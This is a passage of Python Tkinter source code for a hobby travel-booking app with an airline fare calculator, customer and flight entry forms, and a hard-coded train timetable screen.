TT = "INR"+ str('%.2f'%(Cost_of_Fare + ((Cost_of_Fare)*0.09)))
PaidTax.set((Tax))
SubTotal.set(ST)
TotalCost.set(TT)
elif ( var1.get() == 1 and var2.get() == 1 and var3.get() == 1 and var4.get() == 1 and
var9.get() == 1 and var11.get() =="Mumbai"
and var12.get()=="Delhi" and var13.get() =="1"):
q1 =float(45)
q2 =float(63)
q3 =float(334.59)
q4 = float(564.3)
Cost_of_Fare = q1 + q2 + q3 + q4
Tax="INR "+ str('%.2f'%((Cost_of_Fare)*0.09))
ST="INR "+ str('%.2f'%((Cost_of_Fare)))
TT = "INR "+ str('%.2f'%(Cost_of_Fare + ((Cost_of_Fare)*0.09)))
PaidTax.set((Tax))
SubTotal.set(ST)
TotalCost.set(TT)
elif ( var1.get() == 1 and var2.get() == 1 and var3.get() == 1 and var4.get() == 1 and
var9.get() == 1 and var11.get() =="Mumbai"
and var12.get()=="Kolkata" and var13.get() =="1"):
q1 =float(45)
q2 =float(63)
q3 =float(334.59)
q4 = float(564.3)
Cost_of_Fare = q1 + q2 + q3 + q4
Tax="INR "+ str('%.2f'%((Cost_of_Fare)*0.09))
ST="INR "+ str('%.2f'%((Cost_of_Fare)))
TT = "INR "+ str('%.2f'%(Cost_of_Fare + ((Cost_of_Fare)*0.09)))
PaidTax.set((Tax))
SubTotal.set(ST)
TotalCost.set(TT)
elif ( var1.get() == 1 and var2.get() == 1 and var3.get() == 1 and var4.get() == 1 and
var9.get() == 1 and var11.get() =="Delhi"
and var12.get()=="Mumbai" and var13.get() =="1"):
q1 =float(45)
q2 =float(63)
q3 =float(334.59)
q4 = float(564.3)
Cost_of_Fare = q1 + q2 + q3 + q4
Tax="INR "+ str('%.2f'%((Cost_of_Fare)*0.09))
ST="INR "+ str('%.2f'%((Cost_of_Fare)))
TT = "INR "+ str('%.2f'%(Cost_of_Fare + ((Cost_of_Fare)*0.09)))
PaidTax.set((Tax))
SubTotal.set(ST)
TotalCost.set(TT)
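# Every branch of Total_Paid repeats the same arithmetic and differs only in
# the class fare it adds. A minimal sketch (an assumption, not a drop-in
# replacement) of a table-driven version:
FARES = {('Delhi', 'Kolkata', 'Standard'): 274.9,
('Kolkata', 'Delhi', 'Economy'): 365.5,
('Mumbai', 'Delhi', 'FirstClass'): 564.3,
('Mumbai', 'Kolkata', 'FirstClass'): 564.3,
('Delhi', 'Mumbai', 'FirstClass'): 564.3}
EXTRAS = 45 + 63 + 334.59  # airport tax + travel insurance + extra luggage
def compute_totals(departure, destination, ticket_class):
fare = FARES.get((departure, destination, ticket_class))
if fare is None:
return None
cost = EXTRAS + fare
return cost * 0.09, cost, cost + cost * 0.09  # tax, subtotal, total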
#==============================================================================================
MainFrame=Frame(self.root)
MainFrame.grid()
Tops = Frame(MainFrame, bd=20, width=750,relief=RIDGE)
Tops.pack(side=TOP)
self.lblTitle=Label(Tops, font=('arial',70,'bold'),width=25,bg="blue",fg="white",text="ASRD Airways")
self.lblTitle.grid()
#==============================================================================================
CustomerDetailsFrame=Frame(MainFrame, width=750,height=500, bd=20, pady=5,relief=RIDGE)
CustomerDetailsFrame.pack(side=BOTTOM)
FrameDetails=Frame(CustomerDetailsFrame, width=600,height=400, bd=10,relief=RIDGE)
FrameDetails.pack(side=LEFT)
CustomerName=LabelFrame(FrameDetails, width=150,height=250, bd=10,
font=('arial',12,'bold'), text='Customer Details', relief=RIDGE)
CustomerName.grid(row=0,column=0)
TravelFrame = LabelFrame(FrameDetails,bd=10,width=300,height=250,
font=('arial',12, 'bold'),text = 'Travel Details',relief=RIDGE)
TravelFrame.grid(row=0,column=1)
Ticket_Frame = LabelFrame(FrameDetails, width=300,height=150,relief=FLAT)
Ticket_Frame.grid(row=1,column=0)
CostFrame = LabelFrame(FrameDetails, width=150,height=150,relief=FLAT)
CostFrame.grid(row=1,column=1)
#==============================================================================================
Receipt_ButtonFrame=Frame(CustomerDetailsFrame, bd=10,width=350,height=400,relief=RIDGE)
Receipt_ButtonFrame.pack(side=RIGHT)
ReceiptFrame=LabelFrame(Receipt_ButtonFrame, width=350,height=300,
font=('arial',12,'bold'), text='Receipt', relief=RIDGE)
ReceiptFrame.grid(row=0,column=0)
ButtonFrame=LabelFrame(Receipt_ButtonFrame, width=350,height=100,relief=RIDGE)
ButtonFrame.grid(row=1,column=0)
#=====================================CustomerName==========================================
self.lblFirstname = Label(CustomerName,font=('arial', 14,'bold'), text="Firstname", bd=7)
self.lblFirstname.grid(row=0,column=0, sticky=W)
self.txtFirstname = Entry(CustomerName,font=('arial', 14,'bold'), textvariable=Firstname, bd=7,
insertwidth=2, justify=RIGHT)
self.txtFirstname.grid(row=0,column=1)
self.lblSurname = Label(CustomerName,font=('arial', 14,'bold'), text="Surname", bd=7)
self.lblSurname.grid(row=1,column=0, sticky=W)
self.txtSurname= Entry(CustomerName,font=('arial', 14,'bold'), textvariable=Surname, bd=7,
insertwidth=2, justify=RIGHT)
self.txtSurname.grid(row=1,column=1)
self.lblAddress = Label(CustomerName,font=('arial', 14,'bold'), text="Address", bd=7)
self.lblAddress.grid(row=2,column=0, sticky=W)
self.txtAddress = Entry(CustomerName,font=('arial', 14,'bold'), textvariable=Address, bd=7,
insertwidth=2,justify=RIGHT)
self.txtAddress.grid(row=2,column=1)
self.lblPostCode = Label(CustomerName,font=('arial', 14,'bold'), text="Post Code", bd=7)
self.lblPostCode .grid(row=3,column=0, sticky=W)
self.txtPostCode = Entry(CustomerName,font=('arial', 14,'bold'), textvariable=PostCode , bd=7,
insertwidth=2, justify=RIGHT)
self.txtPostCode .grid(row=3,column=1)
self.lblTelephone = Label(CustomerName,font=('arial', 14,'bold'), text="Telephone", bd=7)
self.lblTelephone.grid(row=4,column=0, sticky=W)
self.txtTelephone= Entry(CustomerName,font=('arial', 14,'bold'), textvariable=Telephone, bd=7,
insertwidth=2, justify=RIGHT)
self.txtTelephone.grid(row=4,column=1)
self.Mobile = Label(CustomerName,font=('arial', 14,'bold'), text="Mobile No.", bd=7)
self.Mobile.grid(row=5,column=0, sticky=W)
self.Mobile = Entry(CustomerName,font=('arial', 14,'bold'), textvariable=Mobile, bd=7,
insertwidth=2,justify=RIGHT)
self.Mobile.grid(row=5,column=1)
self.lblEmail = Label(CustomerName,font=('arial', 14,'bold'), text="Email", bd=7)
self.lblEmail.grid(row=6,column=0, sticky=W)
self.txtEmail = Entry(CustomerName,font=('arial', 14,'bold'), textvariable=Email, bd=7,
insertwidth=2,justify=RIGHT)
self.txtEmail.grid(row=6,column=1)
#======================================Flight Information=====================================
self.lblDeparture = Label(TravelFrame,font=('arial', 14,'bold'), text="Departure", bd=7)
self.lblDeparture.grid(row=0,column=0, sticky=W)
self.cboDeparture =ttk.Combobox(TravelFrame, textvariable = var11, state='readonly', font=('arial',20, 'bold'),
width=14)
self.cboDeparture['value']=('','Delhi', 'Mumbai','Kolkata')
self.cboDeparture.current(0)
self.cboDeparture.grid(row=0,column=1)
self.lblDestination = Label(TravelFrame,font=('arial', 14,'bold'), text="Destination", bd=7)
self.lblDestination.grid(row=1,column=0, sticky=W)
self.cboDestination =ttk.Combobox(TravelFrame,textvariable = var12, state='readonly', font=('arial',20, 'bold'),
width=14)
self.cboDestination['value']=('','Delhi', 'Mumbai','Kolkata')
self.cboDestination.current(0)
self.cboDestination.grid(row=1,column=1)
self.lblAccommodation = Label(TravelFrame,font=('arial', 14,'bold'), text="Accommodation", bd=7)
self.lblAccommodation.grid(row=2,column=0, sticky=W)
self.cboAccommodation =ttk.Combobox(TravelFrame,textvariable = var13,state='readonly',font=('arial',20, 'bold'),
width=14)
self.cboAccommodation['value']=('','1', '2','3','4')
self.cboAccommodation.current(1)
self.cboAccommodation.grid(row=2,column=1)
#==============================================================================================
self.chkAirportTax=Checkbutton(TravelFrame,text="Airport Tax",variable = var1, onvalue=1, offvalue=0,
font=('arial', 16,'bold'), command=Airport_Tax).grid(row =3, column=0, sticky=W)
self.txtAirportTax = Entry(TravelFrame,font=('arial', 14,'bold'), textvariable=AirportTax, bd=7,
insertwidth=2,state = DISABLED,justify=RIGHT)
self.txtAirportTax.grid(row=3,column=1)
self.chkMile = Checkbutton(TravelFrame, text="Air Mile", variable=var2, onvalue = 1, offvalue = 0,
font=('arial',16, 'bold'),command=Mileage).grid(row=4, column=0,sticky=W)
self.txtMile= Entry(TravelFrame,font=('arial', 14,'bold'), textvariable=Mile, bd=7,
insertwidth=2,state= DISABLED, justify=RIGHT)
self.txtMile.grid(row=4,column=1)
self.chkTravelling_Insurance = Checkbutton(TravelFrame, text="Travelling Insurance ", variable=var3,
onvalue = 1, offvalue = 0,
font=('arial',16, 'bold'), command= Travelling).grid(row=5, column=0,sticky=W)
self.txtTravelling_Insurance= Entry(TravelFrame,font=('arial', 14,'bold'), textvariable=Travel_Ins, bd=7,
insertwidth=2,state= DISABLED, justify=RIGHT)
self.txtTravelling_Insurance.grid(row=5,column=1)
self.chkExt_Luggage = Checkbutton(TravelFrame, text="Ext. Luggage", variable=var4, onvalue = 1, offvalue = 0,
font=('arial',16, 'bold'), command= Lug).grid(row=6, column=0,sticky=W)
self.txtExt_Luggage= Entry(TravelFrame,font=('arial', 14,'bold'), textvariable=Luggage, bd=7,
insertwidth=2, state= DISABLED, justify=RIGHT)
self.txtExt_Luggage.grid(row=6,column=1)
#=======================================Payment Information====================================
self.lblPaidTax = Label(CostFrame,font=('arial', 14,'bold'), text="Paid Tax\t\t", bd=7,)
self.lblPaidTax.grid(row=0,column=2, sticky=W)
self.txtPaidTax = Entry(CostFrame,font=('arial', 14,'bold'), textvariable=PaidTax, bd=7,
width=26, justify=RIGHT)
self.txtPaidTax.grid(row=0,column=3)
self.lblSubTotal = Label(CostFrame,font=('arial', 14,'bold'), text="Sub Total", bd=7,)
self.lblSubTotal.grid(row=1,column=2, sticky=W)
self.txtSubTotal= Entry(CostFrame,font=('arial', 14,'bold'), textvariable=SubTotal, bd=7,
width=26, justify=RIGHT)
self.txtSubTotal.grid(row=1,column=3)
self.lblTotalCost = Label(CostFrame,font=('arial', 14,'bold'), text="Total Cost", bd=7,)
self.lblTotalCost.grid(row=2,column=2, sticky=W)
self.txtTotalCost = Entry(CostFrame,font=('arial', 14,'bold'), textvariable=TotalCost, bd=7,
width=26,justify=RIGHT)
self.txtTotalCost.grid(row=2,column=3)
#==============================================================================================
self.chkStandard =Checkbutton(Ticket_Frame,text="Standard", variable=var5, onvalue = 1, offvalue = 0,
font=('arial',14, 'bold'),command=Standard_Fees).grid(row=0,column=0)
self.txtStandard= Entry(Ticket_Frame,font=('arial', 14,'bold'),width=6,textvariable=Standard,bd=5,
state =DISABLED,justify=RIGHT)
self.txtStandard.grid(row=0,column=1)
self.chkSingle = Checkbutton(Ticket_Frame, text="Single", variable=var6, onvalue = 1, offvalue = 0,
font=('arial',14, 'bold')).grid(row=0, column=2,sticky=W)
self.chkEconomy = Checkbutton(Ticket_Frame, text="Economy", variable=var7,onvalue = 1, offvalue = 0,
font=('arial',14, 'bold'),command= Economy_Fees).grid(row=1, column=0,sticky=W)
self.txtEconomy= Entry(Ticket_Frame,font=('arial', 14,'bold'),width=6,textvariable=Economy,bd=5,
state =DISABLED,justify=RIGHT)
self.txtEconomy.grid(row=1,column=1)
self.chkReturn = Checkbutton(Ticket_Frame, text="Return", variable=var8, onvalue = 1, offvalue = 0,
font=('arial',14, 'bold')).grid(row=1, column=2,sticky=W)
self.chkFirstClass = Checkbutton(Ticket_Frame,text="FirstClass", variable=var9, onvalue = 1, offvalue = 0,
font=('arial',14, 'bold'), command= FirstClass_Fees).grid(row=2,column=0)
self.txtFirstClass= Entry(Ticket_Frame,font=('arial', 14,'bold'),width=6,textvariable=FirstClass,bd=5,
state =DISABLED,justify=RIGHT)
self.txtFirstClass.grid(row=2,column=1)
self.chkSpecialsNeeds = Checkbutton(Ticket_Frame, text="Special Needs",variable=var10, onvalue = 1,
offvalue = 0, font=('arial',14, 'bold')).grid(row=2, column=2,sticky=W)
#==========================================Receipt=============================================
self.txtReceipt=Text(ReceiptFrame, width=40, height=21,font=('arial', 10,'bold'))
self.txtReceipt.grid(row=0,column=0)
#===========================================Buttons============================================
self.btnTotal=Button(ButtonFrame, padx=18, bd=7,font=('arial', 16,'bold'), width=4,
text='Total', command=Total_Paid).grid(row=0,column=0)
self.btnReceipt=Button(ButtonFrame, padx=18, bd=7,font=('arial', 16,'bold'), width=4,
text='Receipt', command=Receipt).grid(row=0,column=1)
self.btnReset=Button(ButtonFrame, padx=18, bd=7,font=('arial', 16,'bold'), width=4,
text='Reset', command=Reset).grid(row=0,column=2)
self.btnExit=Button(ButtonFrame, padx=18, bd=7,font=('arial', 16,'bold'), width=4,
text='Exit', command=iExit).grid(row=0,column=3)
#==============================================================================================
def air():
root = Toplevel(master)
application = Travel(root)  # the Toplevel shares master's running mainloop
#======Main Screen======#
master = Tk()
master.geometry('1020x750+0+0')
master.title('Travel Agency')
master.configure(bg="medium violet red")
notif = Label(master, font=('Calibri',12))
notif.grid(row=6,sticky=N,pady=10)
def road():
global conn, cursor
conn = sqlite3.connect('Railway.db')
cursor = conn.cursor()
global root
global LoginId,count
global Password
global FROM
global DESTINATION
global Date
global Name
global Age,Gender,Id_Proof
global variable,variable1,variable2,v2,var
global DepartureTime, TrainNumber, Number
def createWindow():
global conn, cursor
conn = sqlite3.connect('Railway.db')
cursor = conn.cursor()
global root
global head
global FROM
global DESTINATION
global Date
global Name
global Age,Gender,Id_Proof
global variable,variable1,variable2,v2,var
global DepartureTime, TrainNumber, Number
root = Toplevel(master)
root.title("Railways 1")
customFont = tkFont.Font(family="Segoe Print", size=14)
root.geometry('1020x750+0+0')
root.config(bg='coral')
# Three tiny hidden Entry widgets act as stores for the dropdown selections;
# the title Label placed at the same coordinates covers them.
entry1 = Entry(root, justify='center', font=('Slab Serif', 3))
entry1.place(x=320, y=10)
entry2 = Entry(root, justify='center', font=('Slab Serif', 3))
entry2.place(x=320, y=10)
entry3 = Entry(root, justify='center', font=('Slab Serif', 3))
entry3.place(x=320, y=10)
Label(root, text="ASRD Railways", font=('Gabriola', 50, 'bold'), fg="gold2", bg="magenta4").place(x=320, y=10)
def fun_1(*args):
entry1.delete(0, END)  # clear any previous choice so values don't concatenate
entry1.insert(10, variable.get())
def fun_2(*args):
entry2.delete(0, END)
entry2.insert(10, variable1.get())
def fun_3(*args):
entry3.delete(0, END)
entry3.insert(10, variable2.get())
variable = StringVar(root)
choices = {'Howrah', 'Lucknow','Ranchi','Hatia'}
variable.set('Choose')
variable.trace("w", fun_1)
popupMenu = OptionMenu(root, variable, *choices)
popupMenu.place(x=550, y=180,width=200)
popupMenu.config(font=('Segoe UI Black',18),bg="light sea green",fg="coral4")
Label(root, text="FROM:",font=('Segoe Print',15,'bold'),fg="violetred4", bg="olivedrab2").place(x=220,y=180)
variable1 = StringVar(root)
trains = {'New Delhi','Chandigarh','Patna','Gaya'}
variable1.set('Choose')
variable1.trace("w", fun_2)
popupMenu1 = OptionMenu(root, variable1, *trains)
Label(root, text="DESTINATION:",font=('Segoe Print',15,'bold'),fg="violetred4", bg="olivedrab2").place(x=220,y=240)
popupMenu1.config(font=('Segoe UI Black',18),bg="light sea green",fg="coral4")
popupMenu1.place(x=550, y=240,width=200)
variable2 = StringVar(root)
classes = {'1A','2A','3A'}
variable2.set('Choose')
variable2.trace("w", fun_3)
popupMenu1 = OptionMenu(root, variable2, *classes)
Label(root, text="ALL CLASSES:",font=('Segoe Print',15,'bold'),fg="violetred4", bg="olivedrab2").place(x=220,y=300)
popupMenu1.config(font=('Segoe UI Black', 18), bg="light sea green",fg="coral4")
popupMenu1.place(x=550, y=300,width=200)
Label(root,text="DATE:",font=('Segoe Print',15,'bold'),fg="violetred4", bg="olivedrab2").place(x=220,y=360)
Date=StringVar()
e1=Entry(root,textvariable=Date)
def Check():
if len(e1.get()) == 0 or len(entry1.get()) == 0 or len(entry2.get()) == 0 or len(entry3.get()) == 0:
tkinter.messagebox.showinfo('Error!!','Select the required options')
else:
Check1()
def Check1():
if (entry1.get() == "Lucknow" and entry2.get() == "Chandigarh" and entry3.get() == "3A") or (entry1.get() == "Lucknow" and entry2.get() == "New Delhi" and entry3.get() == "3A"):
tkinter.messagebox.showinfo('Sorry!!!','No Trains Available!')
else:
# Validate the journey date (DD-MM-YYYY, year 2010-2030) before searching.
try:
travel_date = datetime.datetime.strptime(e1.get(), '%d-%m-%Y')
except ValueError:
tkinter.messagebox.showinfo('Error!', 'Enter in Correct DD-MM-YYYY Format')
return
if not (2010 <= travel_date.year <= 2030):
tkinter.messagebox.showinfo('Error!', 'Enter a year between 2010 and 2030')
return
root.destroy()
Search()
def Search():
global x1
window1=Toplevel(master)
window1.title("Trains' Schedule")
window1.config(bg='palevioletred4')
window1.geometry('1020x450+0+0')
# Build the timetable grid of Entry widgets once; each widget below has a fixed grid position.
e1 = Entry(window1, justify="center",font=('Gabriola',11,'bold'), bg="orange2", fg="red3")
e2 = Entry(window1, justify="center",font=('Gabriola',11,'bold'), bg="orange2", fg="red3")
e3 = Entry(window1, justify="center",font=('Gabriola',11,'bold'), bg="orange2", fg="red3")
e4 = Entry(window1, justify="center",font=('Gabriola',11,'bold'), bg="orange2", fg="red3")
e5 = Entry(window1, justify="center",font=('Gabriola',11,'bold'), bg="orange2", fg="red3")
e6 = Entry(window1, justify="center",font=('Gabriola',11,'bold'), bg="orange2", fg="red3")
e7 = Entry(window1, justify="center",font=('Gabriola',11,'bold'), bg="orange2", fg="red3")
en8 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
e9 = Entry(window1, justify="center",font=('Comic Sans MS',9), bg="light pink")
e10 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
e11 = Entry(window1, justify="center",font=('Comic Sans MS',9), bg="light pink")
e12 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
e13 = Entry(window1, justify="center",font=('Comic Sans MS',9), bg="light pink")
e14 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
en15 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
e16 = Entry(window1, justify="center",font=('Comic Sans MS',9), bg="light pink")
e17 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
e18 = Entry(window1, justify="center",font=('Comic Sans MS',9), bg="light pink")
e19 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
e20 = Entry(window1, justify="center",font=('Comic Sans MS',9), bg="light pink")
e21 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
en22 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
e23 = Entry(window1, justify="center",font=('Comic Sans MS',9), bg="light pink")
e24 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
e25 = Entry(window1, justify="center",font=('Comic Sans MS',9), bg="light pink")
e26 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
e27 = Entry(window1, justify="center",font=('Comic Sans MS',9), bg="light pink")
e28 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
en29 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
e30 = Entry(window1, justify="center",font=('Comic Sans MS',9), bg="light pink")
e31 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
e32 = Entry(window1, justify="center",font=('Comic Sans MS',9), bg="light pink")
e33 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
e34 = Entry(window1, justify="center",font=('Comic Sans MS',9), bg="light pink")
e35 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
e1.grid(row=0, column=0)
e2.grid(row=0, column=1)
e3.grid(row=0, column=2)
e4.grid(row=0, column=3)
e5.grid(row=0, column=4)
e6.grid(row=0, column=5)
e7.grid(row=0, column=6)
en8.grid(row=1, column=0)
e9.grid(row=1, column=1)
e10.grid(row=1, column=2)
e11.grid(row=1, column=3)
e12.grid(row=1, column=4)
e13.grid(row=1, column=5)
e14.grid(row=1, column=6)
en15.grid(row=2, column=0)
e16.grid(row=2, column=1)
e17.grid(row=2, column=2)
e18.grid(row=2, column=3)
e19.grid(row=2, column=4)
e20.grid(row=2, column=5)
e21.grid(row=2, column=6)
en22.grid(row=3, column=0)
e23.grid(row=3, column=1)
e24.grid(row=3, column=2)
e25.grid(row=3, column=3)
e26.grid(row=3, column=4)
e27.grid(row=3, column=5)
e28.grid(row=3, column=6)
en29.grid(row=4, column=0)
e30.grid(row=4, column=1)
e31.grid(row=4, column=2)
e32.grid(row=4, column=3)
e33.grid(row=4, column=4)
e34.grid(row=4, column=5)
e35.grid(row=4, column=6)
e1.insert(10, "Train Number")
e2.insert(10, "Train Name")
e3.insert(10, "FROM")
e4.insert(10, "Departure Time")
e5.insert(10, "DESTINATION")
e6.insert(10, "Arrival")
e7.insert(10, "Class")
if variable.get() == "Howrah" and variable1.get()== "New Delhi":
en8.insert(10, "12235")
e9.insert(10, "Rajdhani Express")
e10.insert(10, "Howrah")
e11.insert(10, "14:30")
e12.insert(10, "New Delhi")
e13.insert(10, "7:55")
e14.insert(10, "1A,2A,3A")
en15.insert(10, "12236")
e16.insert(10, "Howrah Juntion")
e17.insert(10, "Howrah")
e18.insert(10, "16:30")
e19.insert(10, "New Delhi")
e20.insert(10, "5:50")
e21.insert(10, "1A,2A,3A")
en22.insert(10, "12237")
e23.insert(10, "New Delhi 07")
e24.insert(10, "Howrah")
e25.insert(10, "8:35")
e26.insert(10, "New Delhi")
e27.insert(10, "15:50")
e28.insert(10, "1A,2A,3A")
en29.insert(10, "12238")
e30.insert(10, "Anand Vihar")
e31.insert(10, "Howrah")
e32.insert(10, "12:30")
e33.insert(10, "New Delhi")
e34.insert(10, "7:20")
e35.insert(10, "1A,2A,3A")
if variable.get() == "Howrah" and variable1.get()== "Chandigarh":
en8.insert(10, "12239")
e9.insert(10, "Howrah Amritsar Express")
e10.insert(10, "Howrah")
e11.insert(10, "6:30")
e12.insert(10, "Chandigarh")
e13.insert(10, "18:20")
e14.insert(10, "1A,2A,3A")
en15.insert(10, "12240")
e16.insert(10, "Kalka Mail")
e17.insert(10, "Howrah")
e18.insert(10, "14:30")
e19.insert(10, "Chandigarh")
e20.insert(10, "23:30")
e21.insert(10, "1A,2A,3A")
en22.insert(10, "12241")
e23.insert(10, "JallianwalaBagh Express")
e24.insert(10, "Howrah")
e25.insert(10, "12:30")
e26.insert(10, "Chandigarh")
e27.insert(10, "8:40")
e28.insert(10, "1A,2A,3A")
en29.insert(10, "12242")
e30.insert(10, "Durgiana Express")
e31.insert(10, "Howrah")
e32.insert(10, "8:30")
e33.insert(10, "Chandigarh")
e34.insert(10, "16:20")
e35.insert(10, "1A,2A,3A")
if variable.get() == "Lucknow" and variable1.get()== "Chandigarh":
en8.insert(10, "12243")
e9.insert(10, "Garibrath")
e10.insert(10, "Lucknow")
e11.insert(10, "9:30")
e12.insert(10, "Chandigarh")
e13.insert(10, "14:40")
e14.insert(10, "1A,2A")
en15.insert(10, "12244")
e16.insert(10, "Mumbai Bandra (T)")
e17.insert(10, "Lucknow")
e18.insert(10, "1:00")
e19.insert(10, "Chandigarh")
e20.insert(10, "00:45")
e21.insert(10, "1A,2A")
en22.insert(10, "12245")
e23.insert(10, "Pooja SF Express")
e24.insert(10, "Lucknow")
e25.insert(10, "11:05")
e26.insert(10, "Chandigarh")
e27.insert(10, "3:00")
e28.insert(10, "1A,2A")
en29.insert(10, "12246")
e30.insert(10, "Gandhidham")
e31.insert(10, "Howrah")
e32.insert(10, "14:05")
e33.insert(10, "Chandigarh")
e34.insert(10, "6:45")
e35.insert(10, "1A,2A")
if variable.get() == "Lucknow" and variable1.get()== "New Delhi":
en8.insert(10, "12247")
e9.insert(10, "Uttaranchal Express")
e10.insert(10, "Lucknow")
e11.insert(10, "1:40")
e12.insert(10, "New Delhi")
e13.insert(10, "10:40")
e14.insert(10, "1A,2A")
en15.insert(10, "12248")
e16.insert(10, "Rajkot Express")
e17.insert(10, "Lucknow")
e18.insert(10, "6:30")
e19.insert(10, "New Delhi")
e20.insert(10, "10:45")
e21.insert(10, "1A,2A")
en22.insert(10, "12249")
e23.insert(10, "Corbet park link Express")
e24.insert(10, "Lucknow")
e25.insert(10, "11:05")
e26.insert(10, "New Delhi")
e27.insert(10, "20:00")
e28.insert(10, "1A,2A")
en29.insert(10, "12250")
e30.insert(10, "Ranikhet Express")
e31.insert(10, "Lucknow")
e32.insert(10, "12:10")
e33.insert(10, "New Delhi")
e34.insert(10, "21:10")
e35.insert(10, "1A,2A")
if variable.get() == "Ranchi" and variable1.get()== "New Delhi":
en8.insert(10, "12251")
e9.insert(10, "Jan Satabdi Express")
e10.insert(10, "Ranchi")
e11.insert(10, "13:30")
e12.insert(10, "New Delhi")
e13.insert(10, "7:55")
e14.insert(10, "1A,2A,3A")
en15.insert(10, "12252")
e16.insert(10, "Ranchi Express")
e17.insert(10, "Ranchi")
e18.insert(10, "16:30")
e19.insert(10, "New Delhi")
e20.insert(10, "5:50")
e21.insert(10, "1A,2A,3A")
en22.insert(10, "12253")
e23.insert(10, "New Delhi Duronto")
e24.insert(10, "Ranchi")
e25.insert(10, "8:35")
e26.insert(10, "New Delhi")
e27.insert(10, "15:50")
e28.insert(10, "1A,2A,3A")
en29.insert(10, "12254")
e30.insert(10, "Ranchi Road Exp.")
e31.insert(10, "Ranchi")
e32.insert(10, "12:30")
e33.insert(10, "New Delhi")
e34.insert(10, "7:20")
e35.insert(10, "1A,2A,3A")
if variable.get() == "Ranchi" and variable1.get()== "Chandigarh":
en8.insert(10, "12255")
e9.insert(10, "Ranchi-Amritsar Express")
e10.insert(10, "Ranchi")
e11.insert(10, "6:30")
e12.insert(10, "Chandigarh")
e13.insert(10, "18:20")
e14.insert(10, "1A,2A,3A")
en15.insert(10, "12256")
e16.insert(10, "Kalka Mail")
e17.insert(10, "Ranchi")
e18.insert(10, "14:30")
e19.insert(10, "Chandigarh")
e20.insert(10, "23:30")
e21.insert(10, "1A,2A,3A")
en22.insert(10, "12257")
e23.insert(10, "Aanchal Express")
e24.insert(10, "Ranchi")
e25.insert(10, "12:30")
e26.insert(10, "Chandigarh")
e27.insert(10, "8:40")
e28.insert(10, "1A,2A,3A")
en29.insert(10, "12258")
e30.insert(10, "Samvaad Express")
e31.insert(10, "Ranchi")
e32.insert(10, "8:30")
e33.insert(10, "Chandigarh")
e34.insert(10, "16:20")
e35.insert(10, "1A,2A,3A")
if variable.get() == "Hatia" and variable1.get()== "Patna":
en8.insert(10, "12259")
e9.insert(10, "Sapnarath")
e10.insert(10, "Hatia")
e11.insert(10, "9:30")
e12.insert(10, "Patna")
e13.insert(10, "14:40")
e14.insert(10, "1A,2A")
en15.insert(10, "12260")
e16.insert(10, "Hatia Patna Express")
e17.insert(10, "Hatia")
e18.insert(10, "1:00")
e19.insert(10, "Patna")
e20.insert(10, "00:45")
e21.insert(10, "1A,2A")
en22.insert(10, "12261")
e23.insert(10, "Rajdhani Express")
e24.insert(10, "Hatia")
e25.insert(10, "11:05")
e26.insert(10, "Patna")
e27.insert(10, "3:00")
e28.insert(10, "1A,2A")
en29.insert(10, "12262")
e30.insert(10, "Bodhgaya Express")
e31.insert(10, "Hatia")
e32.insert(10, "14:05")
e33.insert(10, "Patna")
e34.insert(10, "6:45")
e35.insert(10, "1A,2A")
if variable.get() == "Hatia" and variable1.get()== "Gaya":
en8.insert(10, "12263")
e9.insert(10, "Chotanagpur Express")
e10.insert(10, "Hatia")
e11.insert(10, "1:40")
e12.insert(10, "Gaya")
e13.insert(10, "10:40")
e14.insert(10, "1A,2A")
en15.insert(10, "12264")
e16.insert(10, "Rajnath Express")
e17.insert(10, "Hatia")
e18.insert(10, "6:30")
e19.insert(10, "Gaya")
e20.insert(10, "10:45")
e21.insert(10, "1A,2A")
en22.insert(10, "12265")
e23.insert(10, "Gaya Hatia link Express")
e24.insert(10, "Hatia")
e25.insert(10, "11:05")
e26.insert(10, "Gaya")
e27.insert(10, "20:00")
e28.insert(10, "1A,2A")
en29.insert(10, "12266")
e30.insert(10, "Maurya Express")
e31.insert(10, "Hatia")
e32.insert(10, "12:10")
e33.insert(10, "Gaya")
e34.insert(10, "21:10")
e35.insert(10, "1A,2A")
if variable.get() == "Howrah" and variable1.get()== "Patna":
en8.insert(10, "12267")
e9.insert(10, "Rajdhani Express")
e10.insert(10, "Howrah")
e11.insert(10, "14:30")
e12.insert(10, "Patna")
e13.insert(10, "7:55")
e14.insert(10, "1A,2A,3A")
en15.insert(10, "12268")
e16.insert(10, "Howrah Patna Rath")
e17.insert(10, "Howrah")
e18.insert(10, "16:30")
e19.insert(10, "Patna")
e20.insert(10, "5:50")
e21.insert(10, "1A,2A,3A")
en22.insert(10, "12269")
e23.insert(10, "Patna Central Exp.")
e24.insert(10, "Howrah")
e25.insert(10, "8:35")
e26.insert(10, "Patna")
e27.insert(10, "15:50")
e28.insert(10, "1A,2A,3A")
en29.insert(10, "12270")
e30.insert(10, "Vastu Vihar Rath")
e31.insert(10, "Howrah")
e32.insert(10, "12:30")
e33.insert(10, "Patna")
e34.insert(10, "7:20")
e35.insert(10, "1A,2A,3A")
if variable.get() == "Howrah" and variable1.get()== "Gaya":
en8.insert(10, "12271")
e9.insert(10, "Howrah Gaya Express")
